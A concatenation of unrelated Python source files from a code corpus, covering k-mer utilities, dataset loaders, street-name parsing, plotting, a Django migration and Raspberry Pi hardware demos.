print(count_orbits(planets))
def t(lines):
"""test build_tree and count_orbits without reading text file
"""
planets = build_tree(lines)
return count_orbits(planets)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3392859
|
# coding: utf-8
# How to use:
# type 'ipython' at the terminal to get to the Interactive Python (IPython) environments
# Type:
# %run batch_replace_rmd.py
import re
methods = 'facs', 'droplet'
for method in methods:
rmds = get_ipython().getoutput(f'ls *{method}.Rmd')
for rmd in rmds:
backup = rmd + '.backup'
get_ipython().system(' cp $rmd $backup')
replaced = rmd + '.replaced'
print(replaced)
batch_name = 'channel' if method == 'droplet' else 'plate.barcode'
with open(rmd) as f:
content = f.read()
content = content.replace(f"""filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name},'cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename)
""",
f"""
filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename)
"""
)
content = content.replace(f"""filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename)
""",
f"""filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation', 'cluster.ids')], file=filename)
"""
)
# print(content)
# content = content.replace("""tissue_of_interest = "Bladder"
# tiss <- ScaleData(object = tiss, vars.to.regress = c("nUMI", "percent.ribo","Rn45s"))""", """tiss <- NormalizeData(object = tiss)
# tiss <- ScaleData(object = tiss)""")
with open(replaced, 'w') as g:
g.write(content)
# get_ipython().system(f'diff Bladder_{method}.Rmd Bladder_{method}.Rmd.replaced')
get_ipython().system(f'diff Lung_{method}.Rmd Lung_{method}.Rmd.replaced')
replaceds = get_ipython().getoutput('ls *.Rmd.replaced')
for replaced in replaceds:
rmd = replaced.split('.replaced')[0]
print(rmd)
get_ipython().system(' mv $replaced $rmd')
|
StarcoderdataPython
|
3223573
|
<reponame>borisz264/mono_seq
import os
import operator
import itertools
import gzip
import numpy as np
from scipy import stats
def old_chris_formula(R, k, read_len):
"""
Implements the formula Chris burge derived
"""
return (4 ** k -1) * ( R * (read_len - k + 1) - (read_len - k) ) / (4 ** k + read_len - k - (R *(read_len - k +1)))
def chris_formula(R, k, read_len):
"""
Implements the formula Chris burge derived
"""
return (4. ** k - 1) * (read_len - k +1 ) * (R - 1) / (4. ** k -R * (read_len -k +1))
def get_adjacent_kmers(kmer):
"""
returns all the k+1 mers that contain the kmer
"""
return ['A' + kmer, 'C' + kmer, 'G' + kmer, 'T' + kmer,
kmer + 'A', kmer + 'C', kmer + 'G', kmer + 'T']
def iter_RNAfold_output(energy_file):
"""
iterates through RNAfold input and returns an energy iterator
"""
for l1, l2 in iterLinePairs(energy_file):
yield float(l2.split(' (')[1].replace(')', ''))
def iterLinePairs(inFile):
for l1, l2 in iterNlines(inFile, 2):
yield l1, l2
def make_dir(dirname):
"""
Makes the directory; doesn't throw an error if it exists.
"""
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except:
print 'The directory was made by another thread extremely recently.'
def file_exists(fname):
"""
makes sure a given file exists
"""
if not os.path.exists(fname):
return False
fstats = os.stat(fname)
if not fstats[6]:
return False
if not os.access(fname, os.R_OK):
raise ValueError('Input File %s cannot be read' % fname)
return True
def getBinIndex_soft_upper(v, bins):
for i in range(len(bins) - 1):
if v > bins[i] and v <= bins[i + 1]:
return i
return -1
def get_barcode(line):
"""
- Extracts the barcode from the first line of a fastq quartet
- Assumes the first line is of the form:
@D5FF8JN1:4:1101:1220:2099#ACTTGA/1
"""
return line.split('#')[-1].split('/')[0]
def get_index_from_kmer(kmer):
"""
returns the base10 version of the base 4 DNA representation
"""
index = 0
base2face = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
for i, base in enumerate(kmer):
if not base in 'ACGT':
return -1
power = len(kmer) - 1 - i
index += base2face[base] * (4 ** power)
return index
def get_kmer_from_index(kmax, index):
"""
takes a number (essentially base 4)
and returns the kmer it corresponds to in alphabetical order
eg.
AAAA = 0*1
CA = 4*4 + 0*1
GC = 3*4 + 1 * 1
"""
bases = 'ACGT'
out = ''
for k in range(kmax - 1, -1, -1):
face, index = divmod(index, 4 ** k)
out += bases[face]
return out
def yield_kmers(k):
"""
An iterater to all kmers of length k in alphabetical order
"""
bases = 'ACGT'
for kmer in itertools.product(bases, repeat=k):
yield ''.join(kmer)
def aopen(file, mode='r'):
if file[-3:] == '.gz':
return gzip.open(file, mode + 'b')
else:
return open(file, mode)
def hamming_N(str1, str2):
if not len(str1) == len(str2):
raise(ValueError, 'lengths don\'t match')
str1 = str1.upper()
str2 = str2.upper()
str1 = str1.replace('N', '#')
return sum(itertools.imap(operator.ne, str1, str2))
def pairwise(iterable):
"""s -> (s0,s1), (s1,s2), (s2, s3), ..."""
a, b = itertools.tee(iterable)
next(b, None)
return itertools.izip(a, b)
# from http://code.activestate.com/recipes/499304-hamming-distance/
def hamming_distance(str1, str2):
assert len(str1) == len(str2)
ne = operator.ne
return sum(itertools.imap(ne, str1, str2))
def iterNlines(inFile, N):
assert N >= 1
with aopen(inFile) as f:
lines = [f.readline() for i in range(N)]
while True:
yield lines
lines = [f.readline() for i in range(N)]
if lines[0] == '':
break
def save_fig(fig1, path, extensions=['png', 'pdf']):
for ext in extensions:
fig1.savefig(path + '.' + ext, transparent=True, dpi = 900)
def simpleaxis(sp):
sp.spines['top'].set_visible(False)
sp.spines['right'].set_visible(False)
sp.get_xaxis().tick_bottom()
sp.get_yaxis().tick_left()
def close_float_value(a, b, max_percent=1.0):
if a == 0 and b == 0:
return True
if not (a > 0 and b > 0):
return False
ratio = float(max(a, b)) / float(min(a, b))
percent_increase = (ratio - 1.0) * 100.0
return percent_increase < max_percent
def significantly_enriched(xs, zthresh=2., scale='linear'):
assert scale in ['linear', 'log']
if scale =='log':
xs = np.log2(xs)
xs = stats.zscore(xs)
return [x > zthresh for x in xs]
def iter4Lines(inFile):
return iterNlines(inFile, 4)
def getAllMismatchedSeqs(kmer, mismatchPositions):
nucs = ['A', 'C', 'G', 'T']
#generate tuples of allowed nucs at each mismatch position using a recursive algorithm
allowedNucs = {}
mismatchPositions = np.array(mismatchPositions)
assert len(set(mismatchPositions)) == len(mismatchPositions)
if len(mismatchPositions) == 0:
yield kmer
else:
mismatchNucs = [] + nucs
#print kmer
#print mismatchPositions
#print mismatchPositions[0]
#print kmer[mismatchPositions[0]]
mismatchNucs.remove(kmer[mismatchPositions[0]])
downstreamMismatchSeqs = getAllMismatchedSeqs(kmer[mismatchPositions[0]+1:], mismatchPositions[1:]-(mismatchPositions[0]+1))
for mismatchNuc in mismatchNucs:
for downstreamMismatchSeq in downstreamMismatchSeqs:
returnSeq = kmer[:mismatchPositions[0]] + mismatchNuc +downstreamMismatchSeq
assert len(returnSeq) == len(kmer)
yield returnSeq
def getPaddedMismatchedAdjacentKmers(kmerSequence, padding, numMismatches):
'''
Yield all sequences of length (len(kmerSequence)+padding )that contain the given kmer, with exactly the given number of mismatches.
The order yielded is as follows:
First mismatches are allowed at position 0 to (numMismatches-1)
For each register:
Iterate through all possible nucs at mismatch position in alphabetical order
Iterate through each nucleotide in padding positions in alphabetical order.
Shift to next register
Move most 3' mismatch position down by one, but not past the end of the kmerSequence if end of KmerSequence
is reached, shift secondmost 3' mismatch 1 nt 3', and reset most 3' mismatch to 1nt 3' of that one
'''
# for troubleshooting, want to check that no repeats are generated, so will assert that size of this list and set
# must be the same
kmer_set = set()
kmer_list =[]
upper_to_combined = {}
nucs = 'ACGT'
#initialize mismatchPositions
#print numMismatches
if numMismatches == 0:
for mismatchedKmer in [kmerSequence]:
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
if paddedSeq not in kmer_set:
kmer_list.append(paddedSeq)
kmer_set.add(paddedSeq)
else:
mismatchPositionsList = itertools.combinations(range(len(kmerSequence)), numMismatches)
for mismatchPositions in mismatchPositionsList:
#print mismatchPositions
for mismatchedKmer in getAllMismatchedSeqs(kmerSequence, mismatchPositions):
for shift in range(padding+1):
#generate all possible mismatches to the kmer
for leftPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = shift)]:
for rightPaddingSeq in [''.join(i) for i in itertools.product(nucs, repeat = padding-shift)]:
paddedSeq = leftPaddingSeq+mismatchedKmer+rightPaddingSeq
paddedUpper = paddedSeq.upper()
if paddedUpper not in kmer_set:
kmer_list.append(paddedUpper)
kmer_set.add(paddedUpper)
#print kmer_list
#print kmer_set
#print len(kmer_list), len(kmer_set)
#assert len(kmer_list) == len(kmer_set)
return kmer_list
|
StarcoderdataPython
|
4835289
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import numpy as np
import paddle
from paddle.io import Dataset
import os
import cv2
from ppcls.data import preprocess
from ppcls.data.preprocess import transform
from ppcls.utils import logger
from .common_dataset import create_operators
class CompCars(Dataset):
def __init__(self,
image_root,
cls_label_path,
label_root=None,
transform_ops=None,
bbox_crop=False):
self._img_root = image_root
self._cls_path = cls_label_path
self._label_root = label_root
if transform_ops:
self._transform_ops = create_operators(transform_ops)
self._bbox_crop = bbox_crop
self._dtype = paddle.get_default_dtype()
self._load_anno()
def _load_anno(self):
assert os.path.exists(self._cls_path)
assert os.path.exists(self._img_root)
if self._bbox_crop:
assert os.path.exists(self._label_root)
self.images = []
self.labels = []
self.bboxes = []
with open(self._cls_path) as fd:
lines = fd.readlines()
for l in lines:
l = l.strip().split()
if not self._bbox_crop:
self.images.append(os.path.join(self._img_root, l[0]))
self.labels.append(int(l[1]))
else:
label_path = os.path.join(self._label_root,
l[0].split('.')[0] + '.txt')
assert os.path.exists(label_path)
with open(label_path) as f:
bbox = f.readlines()[-1].strip().split()
bbox = [int(x) for x in bbox]
self.images.append(os.path.join(self._img_root, l[0]))
self.labels.append(int(l[1]))
self.bboxes.append(bbox)
assert os.path.exists(self.images[-1])
def __getitem__(self, idx):
img = cv2.imread(self.images[idx])
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self._bbox_crop:
bbox = self.bboxes[idx]
img = img[bbox[1]:bbox[3], bbox[0]:bbox[2], :]
if self._transform_ops:
img = transform(img, self._transform_ops)
img = img.transpose((2, 0, 1))
return (img, self.labels[idx])
def __len__(self):
return len(self.images)
@property
def class_num(self):
return len(set(self.labels))
class VeriWild(Dataset):
def __init__(
self,
image_root,
cls_label_path,
transform_ops=None, ):
self._img_root = image_root
self._cls_path = cls_label_path
if transform_ops:
self._transform_ops = create_operators(transform_ops)
self._dtype = paddle.get_default_dtype()
self._load_anno()
def _load_anno(self):
assert os.path.exists(self._cls_path)
assert os.path.exists(self._img_root)
self.images = []
self.labels = []
self.cameras = []
with open(self._cls_path) as fd:
lines = fd.readlines()
for l in lines:
l = l.strip().split()
self.images.append(os.path.join(self._img_root, l[0]))
self.labels.append(np.int64(l[1]))
self.cameras.append(np.int64(l[2]))
assert os.path.exists(self.images[-1])
def __getitem__(self, idx):
try:
with open(self.images[idx], 'rb') as f:
img = f.read()
if self._transform_ops:
img = transform(img, self._transform_ops)
img = img.transpose((2, 0, 1))
return (img, self.labels[idx], self.cameras[idx])
except Exception as ex:
logger.error("Exception occured when parse line: {} with msg: {}".
format(self.images[idx], ex))
rnd_idx = np.random.randint(self.__len__())
return self.__getitem__(rnd_idx)
def __len__(self):
return len(self.images)
@property
def class_num(self):
return len(set(self.labels))
|
StarcoderdataPython
|
3287655
|
<filename>catatom2osm/hgwnames.py<gh_stars>0
"""Parsing of highway names."""
import re
from fuzzywuzzy import fuzz, process
from catatom2osm import config
MATCH_THR = 60
def normalize(text):
return re.sub(r" *\(.*\)", "", text.lower().strip())
def parse(name):
"""Transform the name of a street from Cadastre conventions to OSM ones."""
name = name.split(";")[0] # Remove additional information
name = re.sub(r"[,]+", ", ", name).strip() # Avoids comma without trailing space
result = []
for (i, word) in enumerate(re.split(r"[ ]+", name.strip())):
nude_word = re.sub(r"^\(|\)$", "", word) # Remove enclosing parenthesis
if i == 0:
if word in config.excluded_types:
return ""
else:
new_word = config.highway_types.get(word, word.title())
elif nude_word in config.lowcase_words: # Articles
new_word = word.lower()
elif "'" in word[1:-1]: # Articles with aphostrope
left = word.split("'")[0]
right = word.split("'")[-1]
if left in ["C", "D", "L", "N", "S"]:
new_word = left.lower() + "'" + right.title()
elif right in ["S", "N", "L", "LA", "LS"]:
new_word = left.title() + "'" + right.lower()
else:
new_word = word.title()
else:
new_word = word.title()
new_word = new_word.replace("·L", "·l") # Letra ele geminada
new_word = new_word.replace(".L", "·l") # Letra ele geminada
result.append(new_word)
return " ".join(result).strip()
def match(name, choices):
"""
Fuzzy search best match for string name in iterable choices.
If the result is not good enough returns the name parsed.
Args:
name (str): String to look for
choices (list): Iterable with choices
"""
parsed_name = parse(name)
if fuzz and parsed_name:
normalized = [normalize(c) for c in choices]
try:
matching = process.extractOne(
normalize(parsed_name), normalized, scorer=fuzz.token_sort_ratio
)
if matching and matching[1] > MATCH_THR:
return choices[normalized.index(matching[0])]
except RuntimeError:
pass
return parsed_name
def dsmatch(name, dataset, fn):
"""
Fuzzy search best matching object for string name in dataset.
Args:
name (str): String to look for
dataset (list): List of objects to search for
fn (function): Function to obtain a string from a element of the dataset
Returns:
First element with the maximun fuzzy ratio.
"""
max_ratio = 0
matching = None
for e in dataset:
if fuzz and name:
ratio = fuzz.token_sort_ratio(normalize(name), normalize(fn(e)))
if ratio > max_ratio:
max_ratio = ratio
matching = e
elif normalize(name) == normalize(fn(e)):
matching = e
break
return matching
|
StarcoderdataPython
|
3363787
|
f = open('text.txt')
text = f.read()
#Словарь
import pymorphy2
morph = pymorphy2.MorphAnalyzer()
def LEG (word):
p = morph.parse(word)[0]
pp = p.normal_form
return pp
#print(LEG('звери'))
LEG ('звери')
#e = список знаков препинания формат ,"#знак препинания"
e = ",", ".","!","-","?","»","«","—"
for i in range(len(e)):
text = text.replace(e[i], "")
#Текст без знаков препинания
print(text)
#Текст списком
lll = text.split()
print(lll)
print(type(lll))
# lower().
#нижний регистр
low_text = list(map(str.lower, lll))
low_text = list(map(LEG, lll))
print(low_text)
dictt = {}
for word in low_text:
# print(dictt)
if word in dictt:
dictt[word] +=1
else:
dictt.update({word:1})
list_d = list(dictt.items())
list_d.sort(key=lambda i: i[1])
for i in list_d:
print(i[0], ':', i[1])
# print("yes!")
# for word in word_list:
# #2) проверить ключ в словаре word_count = {};
# if word in word_count:
#
# #3) создать индекс в словаре:
# word_count[word] = 0
|
StarcoderdataPython
|
39280
|
import sim
import utils
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
my_parser = argparse.ArgumentParser(description='Parameters for Simulation')
my_parser.add_argument('-N', '--n_cars', type=int, action='store', help='Number of cars', default = 40)
my_parser.add_argument('-L', '--length', type=int, action='store', help='Length of road', default = 250)
my_parser.add_argument('-P', '--p_break', type=float, action='store', help='probability of stopping', default = 0.1)
my_parser.add_argument('-S', '--steps', type=int, action='store', help='Steps of simulation', required = True)
args = my_parser.parse_args()
print(dir(args))
N=args.n_cars
L=args.length
pos = np.zeros(N)
vel = np.zeros(N)
sim.populate_arrays(pos,vel,N)
pos_list = sim.run_simulation(pos,vel,N,L, MAX_STEPS=args.steps, p = args.p_break)
flow = utils.estimate_flow(pos_list,N, 0,250)
sim_fig = utils.plot_simulation(pos_list)
plt.show()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3285648
|
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import numpy as np
from .reference_points import create_references
from .clust_color import assign_colors
from .misc import process_result_list
def parameters(results, ax=None, free_indices_only=True, lb=None, ub=None,
size=None, reference=None, colors=None, legends=None,
balance_alpha=True, start_indices=None):
"""
Plot parameter values.
Parameters
----------
results: pypesto.Result or list
Optimization result obtained by 'optimize.py' or list of those
ax: matplotlib.Axes, optional
Axes object to use.
free_indices_only: bool, optional
If True, only free parameters are shown. If
False, also the fixed parameters are shown.
lb, ub: ndarray, optional
If not None, override result.problem.lb, problem.problem.ub.
Dimension either result.problem.dim or result.problem.dim_full.
size: tuple, optional
Figure size (width, height) in inches. Is only applied when no ax
object is specified
reference: list, optional
List of reference points for optimization results, containing et
least a function value fval
colors: list, or RGBA, optional
list of colors, or single color
color or list of colors for plotting. If not set, clustering is done
and colors are assigned automatically
legends: list or str
Labels for line plots, one label per result object
balance_alpha: bool (optional)
Flag indicating whether alpha for large clusters should be reduced to
avoid overplotting (default: True)
start_indices: list or int
list of integers specifying the multistarts to be plotted or
int specifying up to which start index should be plotted
Returns
-------
ax: matplotlib.Axes
The plot axes.
"""
# parse input
(results, colors, legends) = process_result_list(results, colors, legends)
for j, result in enumerate(results):
# handle results and bounds
(lb, ub, x_labels, fvals, xs) = \
handle_inputs(result=result, lb=lb, ub=ub,
free_indices_only=free_indices_only,
start_indices=start_indices)
# call lowlevel routine
ax = parameters_lowlevel(xs=xs, fvals=fvals, lb=lb, ub=ub,
x_labels=x_labels, ax=ax, size=size,
colors=colors[j], legend_text=legends[j],
balance_alpha=balance_alpha)
# parse and apply plotting options
ref = create_references(references=reference)
# plot reference points
for i_ref in ref:
# reduce parameter vector in reference point, if necessary
if free_indices_only:
x_ref = np.array(result.problem.get_reduced_vector(i_ref['x']))
else:
x_ref = np.array(i_ref['x'])
x_ref = np.reshape(x_ref, (1, x_ref.size))
# plot reference parameters using lowlevel routine
ax = parameters_lowlevel(x_ref, [i_ref['fval']], ax=ax,
colors=i_ref['color'],
linestyle='--',
legend_text=i_ref.legend,
balance_alpha=balance_alpha)
return ax
def parameters_lowlevel(xs, fvals, lb=None, ub=None, x_labels=None,
ax=None, size=None, colors=None, linestyle='-',
legend_text=None, balance_alpha=True):
"""
Plot parameters plot using list of parameters.
Parameters
----------
xs: nested list or array
Including optimized parameters for each startpoint.
Shape: (n_starts, dim).
fvals: numeric list or array
Function values. Needed to assign cluster colors.
lb, ub: array_like, optional
The lower and upper bounds.
x_labels: array_like of str, optional
Labels to be used for the parameters.
ax: matplotlib.Axes, optional
Axes object to use.
size: tuple, optional
see parameters
colors: list of RGBA
One for each element in 'fvals'.
linestyle: str, optional
linestyle argument for parameter plot
legend_text: str
Label for line plots
balance_alpha: bool (optional)
Flag indicating whether alpha for large clusters should be reduced to
avoid overplotting (default: True)
Returns
-------
ax: matplotlib.Axes
The plot axes.
"""
# parse input
xs = np.array(xs)
fvals = np.array(fvals)
if size is None:
# 0.5 inch height per parameter
size = (18.5, xs.shape[1] / 2)
if ax is None:
ax = plt.subplots()[1]
fig = plt.gcf()
fig.set_size_inches(*size)
# assign colors
colors = assign_colors(vals=fvals, colors=colors,
balance_alpha=balance_alpha)
# parameter indices
parameters_ind = list(range(1, xs.shape[1] + 1))[::-1]
# plot parameters
ax.xaxis.set_major_locator(MaxNLocator(integer=True))
for j_x, x in reversed(list(enumerate(xs))):
if j_x == 0:
tmp_legend = legend_text
else:
tmp_legend = None
ax.plot(x, parameters_ind,
linestyle,
color=colors[j_x],
marker='o',
label=tmp_legend)
plt.yticks(parameters_ind, x_labels)
# draw bounds
parameters_ind = np.array(parameters_ind).flatten()
if lb is not None:
ax.plot(lb.flatten(), parameters_ind, 'k--', marker='+')
if ub is not None:
ax.plot(ub.flatten(), parameters_ind, 'k--', marker='+')
ax.set_xlabel('Parameter value')
ax.set_ylabel('Parameter index')
ax.set_title('Estimated parameters')
if legend_text is not None:
ax.legend()
return ax
def handle_inputs(result, free_indices_only, lb=None, ub=None,
start_indices=None):
"""
Computes the correct bounds for the parameter indices to be plotted and
outputs the corrsponding parameters and their labels
Parameters
----------
result: pypesto.Result
Optimization result obtained by 'optimize.py'.
free_indices_only: bool, optional
If True, only free parameters are shown. If
False, also the fixed parameters are shown.
lb, ub: ndarray, optional
If not None, override result.problem.lb, problem.problem.ub.
Dimension either result.problem.dim or result.problem.dim_full.
start_indices: list or int
list of integers specifying the multistarts to be plotted or
int specifying up to which start index should be plotted
Returns
-------
lb, ub: ndarray
Dimension either result.problem.dim or result.problem.dim_full.
x_labels: list of str
ytick labels to be applied later on
fvals: ndarray
objective function values which are needed for plotting later
xs: ndarray
parameter values which will be plotted later
"""
# retrieve results
fvals = result.optimize_result.get_for_key('fval')
xs = result.optimize_result.get_for_key('x')
# parse indices which should be plotted
if start_indices is not None:
start_indices = np.array(start_indices, dtype=int)
# reduce number of displayed results
xs_out = [xs[ind] for ind in start_indices]
fvals_out = [fvals[ind] for ind in start_indices]
else:
# use non-reduced versions
xs_out = xs
fvals_out = fvals
# get bounds
if lb is None:
lb = result.problem.lb
if ub is None:
ub = result.problem.ub
# get labels
x_labels = result.problem.x_names
# handle fixed and free indices
if free_indices_only:
for ix, x in enumerate(xs_out):
xs_out[ix] = result.problem.get_reduced_vector(x)
lb = result.problem.get_reduced_vector(lb)
ub = result.problem.get_reduced_vector(ub)
x_labels = [x_labels[int(i)] for i in result.problem.x_free_indices]
else:
lb = result.problem.get_full_vector(lb)
ub = result.problem.get_full_vector(ub)
return lb, ub, x_labels, fvals_out, xs_out
|
StarcoderdataPython
|
1745982
|
<gh_stars>0
import tarfile
import tempfile
import json
import shutil
import torch
import torch.nn as nn
class BaseNet(nn.Module, object):
def __init__(self, **kwargs):
super(BaseNet, self).__init__()
# Keep all the __init__parameters for saving/loading
self.net_parameters = kwargs
def save(self, filename):
with tarfile.open(filename, "w") as tar:
temporary_directory = tempfile.mkdtemp()
name = "{}/net_params.json".format(temporary_directory)
json.dump(self.net_parameters, open(name, "w"))
tar.add(name, arcname="net_params.json")
name = "{}/state.torch".format(temporary_directory)
torch.save(self.state_dict(), name)
tar.add(name, arcname="state.torch")
shutil.rmtree(temporary_directory)
return filename
@classmethod
def load(cls, filename, device=torch.device('cpu')):
with tarfile.open(filename, "r") as tar:
net_parameters = json.loads(
tar.extractfile("net_params.json").read().decode("utf-8"))
path = tempfile.mkdtemp()
tar.extract("state.torch", path=path)
net = cls(**net_parameters)
net.load_state_dict(
torch.load(
path + "/state.torch",
map_location=device,
)
)
return net, net_parameters
def clean_locals(**kwargs):
del kwargs['self']
del kwargs['__class__']
return kwargs
|
StarcoderdataPython
|
3387169
|
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.OUT)
p = GPIO.PWM(7,50)
p.start(7.5)
time.sleep(1)
p.ChangeDutyCycle(2.5)
time.sleep(2)
p.ChangeDutyCycle(7.5)
except KeyboardInterrupt:
GPIO.cleanup()
if __name__ == "__main__":
import sys
fib(int(sys.argv[1]))
|
StarcoderdataPython
|
1731441
|
<filename>gemtown/modelers/migrations/0002_auto_20190420_1510.py
# Generated by Django 2.0.13 on 2019-04-20 06:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('modelers', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='modeler',
name='creator',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='modeler_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='likeofmodeler',
name='creator',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='likeOfModel_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='likeofmodeler',
name='modeler',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='likeOfModel_modeler', to='modelers.Modeler'),
),
migrations.AddField(
model_name='commentofmodeler',
name='creator',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='comment_creator', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='commentofmodeler',
name='modeler',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='comment_modeler', to='modelers.Modeler'),
),
]
|
StarcoderdataPython
|
3265059
|
from roamtokenize import WordOnlyTokenizer
import re
from nltk.tokenize import sent_tokenize
normalization_patterns = [
("long_punctuation_formatting", '(\-{3,}|\.{3,}|\_{3,})',' FORMATTING '),
("de-ids", '(([0-9]+[A-Z]+)+[0-9]*|([A-Z]+[0-9]+)+[A-Z]*)', " DEIDENTIFIED "),
("data_re", r"\*\*DATE\[\d\d/\d\d(/\d\d\d\d)?]", " DATE "),
("initial", r" [A-Z]\.", "INITIAL"),
("number_re", '[0-9]+', 'NUMBER')]
#("whitespace", '\s', ' ')]
p_to_test = ['date_re', 'number_re']
def normalize(text):
for pattern in normalization_patterns:
text = re.sub(pattern[1], pattern[2], text)
return text
def tokenize(text):
text = [sent_tokenize(s) for s in text.split('\n') if s]
sentences = [[word_tokenize(sent) for sent in line] for line in text]
sentences = '\n'.join(['\n'.join(s) for s in sentences])
return sentences
TOKENIZER = WordOnlyTokenizer()
def word_tokenize(text):
return " ".join(TOKENIZER.tokenize(text))
|
StarcoderdataPython
|
103480
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 14 21:24:02 2021
@author: JOSEP
"""
import pandas as pd
import numpy as np
import matplotlib
df = pd.read_csv("NFT_Sales.csv")
nft_df = df
nft_df.head()
nft_df["NaN"] = df.apply(lambda x: 1 if x.isna() else 0, axis=1)
missing_values = nft_df.isnull()
nft_df["NaN"] = missing_values.apply(lambda x: 1 if x else 0, axis=1)
for col in missing_values.columns:
print(col)
print(nft_df[col].isnull().any())
nft_df["NaN"] = nft_df[col].isnull().any()
# nft_df=groupby(by="Year").count()
nft_df["NaN"] = missing_values["Date"].apply(lambda x: 1 if x else x)
nft_df["col1"].isnull().any()
|
StarcoderdataPython
|
3334490
|
<reponame>staguchi0703/ABC164
def resolve():
'''
code here
'''
S = input()
def chk(num_str):
temp = int(num_str) % 2019
if temp == 0:
return True
else:
return False
ans_set = [ str((i+1) * 2019) for i in range(2*10**5//2019)]
cnt = 0
temp = ''
for i in range(len(S)):
for j in range(i, len(S)):
if chk(S[i:j]) and j > 1:
cnt += 1
print(cnt)
if __name__ == "__main__":
resolve()
|
StarcoderdataPython
|
1601707
|
<filename>rpi-rgb-led-matrix-master/matrixtest.py
#!/usr/bin/python
# Simple RGBMatrix example, using only Clear(), Fill() and SetPixel().
# These functions have an immediate effect on the display; no special
# refresh operation needed.
# Requires rgbmatrix.so present in the same directory.
import time
from rgbmatrix import Adafruit_RGBmatrix
# Rows and chain length are both required parameters:
matrix = Adafruit_RGBmatrix(32, 1)
# Flash screen red, green, blue (packed color values)
matrix.Fill(0xFF0000)
time.sleep(1.0)
matrix.Fill(0x00FF00)
time.sleep(1.0)
matrix.Fill(0x0000FF)
time.sleep(1.0)
# Show RGB test pattern (separate R, G, B color values)
for b in range(16):
for g in range(8):
for r in range(8):
matrix.SetPixel(
(b / 4) * 8 + g,
(b & 3) * 8 + r,
(r * 0b001001001) / 2,
(g * 0b001001001) / 2,
b * 0b00010001)
time.sleep(10.0)
matrix.Clear()
|
StarcoderdataPython
|
1786794
|
import pandas as pd
import matplotlib.pyplot as plt
from downloadTabelas import downloadTabela
import os
datasp = pd.DataFrame(columns=['ano', 'sp', 'sbc', 'g', 'c', 'sjc'])
# Downloading files in 'seade.gov.br'
downloadTabela()
# Excel to Pandas
import glob, os
os.chdir("C:/Users/Matheus/Documents/PIBbrasil/SeadeFiles/")
for file in glob.glob("*.xlsx"):
filesplit = file.split('pib_')[1]
filesplit2 = filesplit.split('.')[0]
year = filesplit2.split('-')[0]
#print(year)
df = pd.read_excel(file, header=10)
os.remove(file)
df.columns = ['MUNICIPIO', 'AGROPECUARIA', 'INDUSTRIA', 'ADM PUBLICA', 'SUBTOTAL', 'TOTAL', 'IMPOSTOS', 'PIB', 'PIB CAPITA']
datasp = datasp.append({
'ano': str(year),
'sp': df.loc[df['MUNICIPIO'] == "São Paulo"]['PIB CAPITA'].values,
'sbc': df.loc[df['MUNICIPIO'] == "São Bernardo do Campo"]['PIB CAPITA'].values,
'g': df.loc[df['MUNICIPIO'] == "Guarulhos"]['PIB CAPITA'].values,
'c': df.loc[df['MUNICIPIO'] == "Campinas"]['PIB CAPITA'].values,
'sjc': df.loc[df['MUNICIPIO'] == "São José dos Campos"]['PIB CAPITA'].values
}, ignore_index=True)
print(datasp)
# plotting
ax = plt.gca()
ax.set_facecolor('#F6F9ED')
datasp['sp'] = datasp['sp'].astype(float)
datasp['sbc'] = datasp['sbc'].astype(float)
datasp['g'] = datasp['g'].astype(float)
datasp['c'] = datasp['c'].astype(float)
datasp['sjc'] = datasp['sjc'].astype(float)
datasp.plot(kind='line', x='ano', y='sp', label='São Paulo (SP)', ax=ax, color='#42124C')
datasp.plot(kind='line', x='ano', y='c', label='Campinas (SP)', ax=ax, color='#2FF3E0')
datasp.plot(kind='line', x='ano', y='g', label='Guarulhos (SP)', ax=ax, color='#F8D210')
